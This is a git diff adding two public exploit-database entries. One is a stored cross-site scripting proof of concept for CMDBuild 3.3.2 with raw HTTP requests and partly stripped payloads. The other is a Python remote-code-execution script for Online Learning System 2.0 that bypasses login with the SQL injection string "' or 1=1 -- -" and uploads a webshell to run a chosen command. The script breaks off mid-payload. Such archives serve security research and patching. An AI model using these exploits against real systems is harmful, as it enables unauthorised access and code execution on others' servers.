diff --git a/exploits/multiple/webapps/50527.txt b/exploits/multiple/webapps/50527.txt
new file mode 100644
index 000000000..686c51ded
--- /dev/null
+++ b/exploits/multiple/webapps/50527.txt
@@ -0,0 +1,81 @@
+# Exploit Title: CMDBuild 3.3.2 - 'Multiple' Cross Site Scripting (XSS)
+# Date: 15/11/2021
+# Exploit Author: Hosein Vita
+# Vendor Homepage: https://www.cmdbuild.org
+# Software Link: https://www.cmdbuild.org/en/download/latest-version
+# Version: CMDBuild 3.3.2
+# Tested on: Linux
+
+Summary:
+
+Multiple stored cross-site scripting (XSS) vulnerabilities in Tecnoteca CMDBuild 3.3.1 allow remote attackers to inject arbitrary web script or HTML via a crafted SVG document. The attack vectors include Add Attachment, Add Office, and Add Employee. Almost all add sections
+
+Proof of concepts :
+
+Stored Xss Example:
+
+1-Login to you'r Dashboard As a low privilege user
+2-Click On Basic archives and Employee
+3- +Add card Employee
+4- Enter your xss payload in parameters
+5-On added employee click on "Open Relation Graph"
+
+POST /cmdbuild/services/rest/v3/classes/Employee/cards?_dc=1636978977758 HTTP/1.1
+...
+Cmdbuild-Actionid: class.card.new.open
+Cmdbuild-Requestid: f487ca06-3678-425f-8606-c6b671145353
+
+Cmdbuild-Clientid: WL3L4mteNCU51FxhSQVzno3K
+X-Requested-With: XMLHttpRequest
+Content-Length: 302
+Connection: close
+
+{"_type":"Employee","_tenant":"","Code":"\">","Description":null,"Surname":"\">
","Name":"\">
","Type":null,"Qualification":null,"Level":null,"Email":null,"Office":null,"Phone":null,"Mobile":null,"Fax":null,"State":null}
+
+
+------------------------------------------------------------------------
+
+
+File upload Xss example:
+
+1-Click on Basic archives
+2-Click on Workplace - + Add card Workplace
+3-Select "attachments" icon - +Add attachment + image
+4-Upload your svg file with xss payload
+5-Click on preview and Right click open in new tab
+
+
+
+Request:
+POST /cmdbuild/services/rest/v3/classes/Workplace/cards/271248/attachments HTTP/1.1
+Cmdbuild-Actionid: class.card.attachments.open
+
+-----------------------------269319782833689825543405205260
+Content-Disposition: form-data; name="file"; filename="kiwi.svg"
+Content-Type: image/svg+xml
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/50526.py b/exploits/php/webapps/50526.py
new file mode 100755
index 000000000..0e76304ca
--- /dev/null
+++ b/exploits/php/webapps/50526.py
@@ -0,0 +1,110 @@
+# Exploit Title: Online Learning System 2.0 - Remote Code Execution (RCE)
+# Date: 15/11/2021
+# Exploit Author: djebbaranon
+# Vendor Homepage: https://github.com/oretnom23
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/elearning_v2_0.zip
+# Version: 2.0
+# Tested on: Kali linux / Windows 10
+# CVE : CVE-2021-42580
+
+#!/usr/bin/python3
+import os
+import time
+import argparse
+import requests
+import sys
+from colorama import init
+from colorama import Fore
+from colorama import Back
+from colorama import Style
+init(autoreset=True)
+def banner():
+ print('''
+
+ _____ _ _ _ _ _____ ______ _____ _____
+| _ | | (_) | | (_) / __ \ | ___ / __ | ___|
+| | | |_ __ | |_ _ __ ___ | | ___ __ _ _ __ _ __ _ _ __ __ _ __ _`' / /' | |_/ | / \| |__
+| | | | '_ \| | | '_ \ / _ \ | |/ _ \/ _` | '__| '_ \| | '_ \ / _` | \ \ / / / / | /| | | __|
+\ \_/ | | | | | | | | | __/ | | __| (_| | | | | | | | | | | (_| | \ V /./ /___ | |\ \| \__/| |___
+ \___/|_| |_|_|_|_| |_|\___| |_|\___|\__,_|_| |_| |_|_|_| |_|\__, | \_/ \_____/ \_| \_|\____\____/
+ __/ |
+ |___/
+ Written by djebbaranon
+ twitter : @dj3bb4ran0n1
+ zone-h : http://zone-h.org/archive/notifier=djebbaranon
+''')
+banner()
+def my_args():
+ parser = argparse.ArgumentParser(epilog="Example : python3 -u http://localhost/elearning -r 1000 -c whoami")
+ parser.add_argument("-u","--url",type=str,required=True,help="url of target")
+ parser.add_argument("-r","--range",type=int,required=True,help="range for bruteforce the webshell name")
+ parser.add_argument("-c","--command",type=str,required=True,help="command to execute")
+ my_arguments = parser.parse_args()
+ return my_arguments
+def login_with_sqli_login_bypass(user,passw):
+ global session
+ global url
+ global cookies
+ url = my_args().url
+ session = requests.Session()
+ data = {
+ "username" : user,
+ "password" : passw,
+ }
+ try:
+ response = session.post(url + "/classes/Login.php?f=login",data=data,verify=False)
+ print( Fore.GREEN + "[+] Logged in succsusfully")
+ cookies = response.cookies.get_dict()
+ print("[+] your cookie : ")
+ except requests.HTTPError as exception:
+ print(Fore.RED + "[-] HTTP Error : {}".format(exception))
+ sys.exit(1)
+login_with_sqli_login_bypass("' or 1=1 -- -","' or 1=1 -- -")
+def main(shell_name,renamed_shell):
+ try:
+ payload ={
+ "id" : "",
+ "faculty_id" : "test",
+ "firstname" : "test",
+ "lastname" : "test",
+ "middlename" : "fsdfsd",
+ "dob" : "2021-10-29",
+ "gender": "Male",
+ "department_id" : "1",
+ "email" : "zebi@gmail.com",
+ "contact" : "zebii",
+ "address" : "zebii",
+ }
+ files = {
+ "img" :
+ (
+ shell_name,
+ "